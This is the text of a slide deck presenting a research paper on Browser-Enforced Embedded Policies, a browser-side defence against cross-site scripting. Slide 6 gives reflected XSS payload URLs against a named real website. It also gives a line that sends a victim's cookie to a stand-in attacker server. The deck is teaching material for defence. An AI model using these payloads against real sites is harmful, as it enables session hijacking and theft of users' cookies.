Defeating Script Injection Attacks with BrowserEnforced Embedded Policies - PowerPoint PPT Presentation
1
Defeating Script Injection Attacks with
Browser-Enforced Embedded Policies
  • By
  • Trevor Jim, AT&T Labs Research
  • Nikhil Swamy and Michael Hicks, University of
    Maryland, College Park
  • Presented by Lauri Marc Ahlman

2
Itinerary
  • Explanation and Overview of Cross-Site Scripting
    Attacks (XSS)
  • -Examples
  • -Demonstration
  • Solution Proposed by Authors
  • -What it is
  • -How it works
  • -Different Policies
  • -Implementation

3
Cross Site Scripting
  • Typical (simplified) web application login
    scenario
  • -User sends username and password to server
  • -Server authenticates user, sends back cookie
  • -Values stored in the cookie are then the only
    authentication tokens used for the remainder of
    the session
  • If an attacker can capture a user's cookie, that
    user's session is vulnerable to being hijacked
  • Cross Site Scripting can be used to steal the
    cookie!

4
Cross Site Scripting
  • A cross site scripting attack occurs when a third
    party injects a script into a trusted page, and
    that script is run in the user's browser.
  • There are two main types of XSS attack
  • -Reflected (Non-persistent) attacks
  • -Persistent attacks

5
Reflected (Non-persistent) Cross Site Scripting
Attacks
  • A website is vulnerable to a reflected XSS attack
    when it embeds part of the URL into the page
    without filtering the content
  • The script is injected into the page served to
    the user, but is not stored on the server
  • Popular when used with phishing attacks
  • Demonstration

6
Scripts used
  • http://www.e-flux.com/search?keyword=%3C/b%3E%3Cscript%3Ealert(%22This%20is%20a%20test%22)%3C/script%3E%3Cb%3Eart
  • Decoded by the browser to: </b><script>alert("This is a test")</script><b>art
  • http://www.e-flux.com/search?keyword=%3C/b%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cb%3Eart
  • Decoded by the browser to: </b><script>alert(document.cookie)</script><b>art
  • document.location.replace('http://malicious-server.com/cookie_monster.cgi?' + document.cookie)

7
Persistent Cross Site Scripting Attacks
  • A persistent cross site scripting attack stores
    the script on the server
  • Often used on forums, message boards, and other
    content management systems where users post data
    that is served to other users
  • Demonstration

8
Other Methods of Preventing XSS Attacks
  • Escape encoding
  • -Encoding < and > as &lt; and &gt; would prevent
    people from creating rich content using other
    HTML tags
  • Detecting scripts
  • -Very difficult due to the wide variety of methods
    to invoke a script

9
Invoking a Script
  • (This slide listed several HTML constructs that
    run an embedded script; the tag markup was lost
    in extraction and only the placeholder word
    "code" survives from each example.)

10
Browser Enforced Embedded Policies (BEEP)
  • Method suggested by authors of paper
  • Relies on two basic principles
  • -Web developer knows what scripts should be run
    from the website
  • -Browser detects all scripts that will be run when
    it parses the page; if a script is not detected by
    the browser, it cannot be run
  • Implemented on the web page by the developer, as
    well as in the browser on the client side

11
Browser Enforced Embedded Policies (BEEP)
  • Makes use of a Security Hook function in the web
    page
  • -Script executed first by the browser
  • -Located in the head of the HTML file
  • Every time a script is encountered in the page,
    the security hook is invoked and its policy
    applied.
  • The authors suggest two distinct policies to be
    used
  • -Whitelist
  • -DOM Sandboxing

12
Whitelist Policy
  • Hook function includes the message digest (MD) of
    every script on the page
  • When the browser encounters a script, it
    calculates the MD of the script, and the hook
    compares it to the saved MDs.
  • If there is a match, the script is executed;
    otherwise it is not.
  • The authors used SHA-1 for hashing

13
DOM Sandboxing
  • Blacklist approach
  • Instead of designating which scripts should be
    run, designates dangerous sections of the page's
    code
  • Designates those sections as non-executable

14
Client Side Implementation
  • The authors were able to modify three browsers
    with relative ease
  • -Konqueror: 650 lines of code
  • -Safari: 650 lines of code
  • -Opera: 79 lines of code
  • Also added a SHA-1 implementation to each

15
Questions???
16
  • Thank you very much.